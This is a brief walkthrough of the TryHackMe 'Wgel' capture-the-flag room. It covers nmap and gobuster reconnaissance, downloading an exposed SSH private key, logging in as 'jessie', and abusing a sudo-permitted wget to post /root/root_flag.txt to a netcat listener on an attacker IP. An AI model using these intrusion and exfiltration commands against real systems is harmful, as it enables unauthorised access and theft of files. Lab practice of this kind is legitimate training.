TryHackMe: Wgel CTF

1. Port scan

nmap -Pn <ip>

2. OS and Services scan

nmap -A -p 22,80 <ip>

3. Access HTTP Site

3. View page source, there’s a message. Seems like there’s username, which is jessie or Jessie.

4. Scan with gobuster

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://<ip>/ -x php,txt,html

There’s sitemap

Access /sitemap, nothing much.

5. Scan sitemap with gobuster

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://<ip>/sitemap/ -x php,txt,html

Nothing much, because I already accessed these pages.

6. Scan sitemap with gobuster with another wordlist

gobuster dir --wordlist /usr/share/dirb/wordlists/common.txt -u http://<ip>/ -x php,txt,html

7. Now I found private key of ssh service

8. Download it

wget http://<ip>/sitemap/.ssh/id_rsa

9. Change permission

chmod 600 id_rsa

10. Login with SSH

ssh -i id_rsa jessie@<ip>

11. Explore /home/jessie

ls
cd Desktop
ls
cd ..
cd Documents
ls
cat user_flag.txt

12. Check if jessie can use sudo

sudo -l

There’s wget. I can use it to send root flag to my machine.

13. Create listener for root flag file

nc -lvp 80 > root.txt

14. Send file

sudo wget --post-file=/root/root_flag.txt <attacker ip>

15. Read root flag file

ls
cat root_flag.txt